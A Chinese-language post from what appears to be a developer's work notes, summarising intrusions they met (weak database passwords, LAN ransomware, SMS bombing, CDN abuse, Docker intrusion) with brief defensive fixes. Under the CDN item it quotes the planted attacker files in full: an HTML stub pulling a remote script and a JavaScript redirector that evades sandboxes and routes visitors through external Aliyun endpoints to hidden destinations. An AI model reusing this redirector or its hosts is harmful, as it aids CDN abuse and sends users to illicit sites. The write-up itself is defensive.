工作经验，黑产灰产入侵总结文件挂载刷流量，勒索病毒，短信炸弹

1.弱密码导致数据库被扫描。

解决：使用密码生成器生成强密码

2.勒索病毒通过局域网传播

解决：服务器和开发者下载火绒或360定期病毒查杀，不下载第三方来源文件。

3.短信炸弹

解决：添加短信超量定时任务，发现异常及时通知，限制IP，手机号获取验证码。

4.CDN 流量滥用

解决:禁止上传html、dll、jsp等文件

其中代码

<!--<svg>-->
	<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd">
	<html xmlns="http://www.w3.org/1999/xhtml">
	<head>
		<title>正在跳转...</title>
		<meta name="viewport" content="width=device-width, initial-scale=1.0,maximum-scale=1.0, user-scalable=no" />
		<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
		<script charset="utf-8" language="javascript" type="text/javascript" src="//yongshengos.oss-cn-chengdu.aliyuncs.com/dsaax.js"></script>
	<!--r4r8smtbr3 -->
</head>
	
	<body>正在加载</body>
	
	</html>

let duanjie_url = '//ga-bp174iu80jo5x2mdgt1fw.aliyunga0017.com/api/short/getshort/a66abb5684c45962d887564f08346e8d'
let rukou_url = '//nlb-kox43fpu38l2k51d7x.cn-hongkong.nlb.aliyuncs.com/api/Domain?code='
let box_url = '//nlb-kox43fpu38l2k51d7x.cn-hongkong.nlb.aliyuncs.com/api/Domain/getbox'
//先判断是否在浏览器中
if(window.screen.width==0){window.location.replace("https://qq.com?t=1")};

//获取参数
function getQueryParams() {
  let url = window.location.href;
  const queryStringIndex = url.indexOf("?");
  if (queryStringIndex === -1) {
    return {};
  }
  let queryString = url.substring(queryStringIndex + 1);
  let firstPart = queryString.split("&")[0]; // 截取 `&` 前的部分
  let decodedString;
  try {
    decodedString = atob(firstPart);
  } catch (e) {
    decodedString = queryString;
  }
  let arr = decodedString.split("&");
  let result = {};
  for (let i = 0; i < arr.length; i++) {
    let item = arr[i].split("=");
    let key = decodeURIComponent(item[0].trim());
    let value = item[1] ? decodeURIComponent(item[1].trim()) : "";
    result[key] = value;
  }
  
  return result;
}


function duanjie(key){
    const httpRequest = new XMLHttpRequest();
    httpRequest.open("POST", duanjie_url);
    httpRequest.setRequestHeader("Content-Type", "application/x-www-form-urlencoded");
    httpRequest.send("Mork=" + key);
    httpRequest.onreadystatechange = function () {
        
        if (httpRequest.readyState === 4 && httpRequest.status === 200) {
            let data=JSON.parse(httpRequest.responseText);
            self.location.href = data.url;
        }
    }
}
function rukou(code){
    let httpRequest = new XMLHttpRequest();
    httpRequest.open('GET', rukou_url+code);
    httpRequest.setRequestHeader("x-requested-with", "XMLHttpRequest");
    httpRequest.send();
    httpRequest.onreadystatechange = function () {
      if (httpRequest.readyState === 4) {
        if (httpRequest.status !== 200) {
          window.location.reload()
          return
         }
         let res = JSON.parse(httpRequest.responseText);
         if (res.code !== 1) {
          window.location.href = 'http://www.baidu.com?t=req_link_code_not_200';
          return
         }
        let link = res.data
        self.location.href = link
      }
    }
}

function videobox(box,param){
    
   let httpRequest = new XMLHttpRequest();
    httpRequest.open('POST', box_url);
    httpRequest.setRequestHeader("Content-Type", "application/x-www-form-urlencoded");
    if (param !== undefined) {
        httpRequest.send("code=" + box + "&param=" + param);
    } else {
        httpRequest.send("code=" + box);
    }
    httpRequest.onreadystatechange = function () {
      if (httpRequest.readyState === 4) {
        if (httpRequest.status !== 200) {
          window.location.reload()
          return
         }
         let res = JSON.parse(httpRequest.responseText);
         if (res.code !== 1) {
          window.location.href = 'http://www.baidu.com?t=req_link_code_not_200';
          return
         }
        let link = res.data
        self.location.href = link
      }
    }
}


function weirukou(wei) {
  let httpRequest = new XMLHttpRequest();
  httpRequest.open('GET', rukou_url + wei);
  httpRequest.setRequestHeader("x-requested-with", "XMLHttpRequest");
  httpRequest.send();
  httpRequest.onreadystatechange = function () {
      if (httpRequest.readyState === 4) {
          if (httpRequest.status !== 200) {
              window.location.reload()
              return
          }

          const container=document.body;        
          const iframe = document.createElement('iframe');
          let res = JSON.parse(httpRequest.responseText);
          if (res.code !== 1) {
              window.location.href = 'http://www.baidu.com?t=req_link_code_not_200';
              return
          }
          container.innerHTML='';
          document.title = "请在同一网络环境下观看";
          // 添加样式以确保 iframe 充满整个页面
            document.documentElement.style.margin = '0';
            document.documentElement.style.padding = '0';
            document.documentElement.style.width = '100%';
            document.documentElement.style.height = '100%';
            document.body.style.margin = '0';
            document.body.style.padding = '0';
            document.body.style.width = '100%';
            document.body.style.height = '100%';
            document.body.style.overflow = 'hidden'; // 禁用滚动条
            // 设置 iframe 的样式
            iframe.style.width = '100%';
            iframe.style.height = '100%';
            iframe.style.border = 'none';
          let link = res.data;
          iframe.src = link;
          iframe.frameBorder = "0";
          iframe.style.width = "100%";
          iframe.style.height = "100%";
          container.appendChild(iframe);
      }
  }
}


//短接
let {code,Mork,box,param,wei} = getQueryParams();
if(code){
    rukou(code)
}else if(Mork){
    duanjie(Mork)
}else if(box){
    videobox(box,param)
}else if(wei){
    weirukou(wei)
   }else{
    self.location.href = "http://www.baidu.com?t=req_link_code_not_404";
}

5.Docker容器入侵

解决:限制ip地址访问，lua加密服务器Docker资源,及时释放虚拟化资源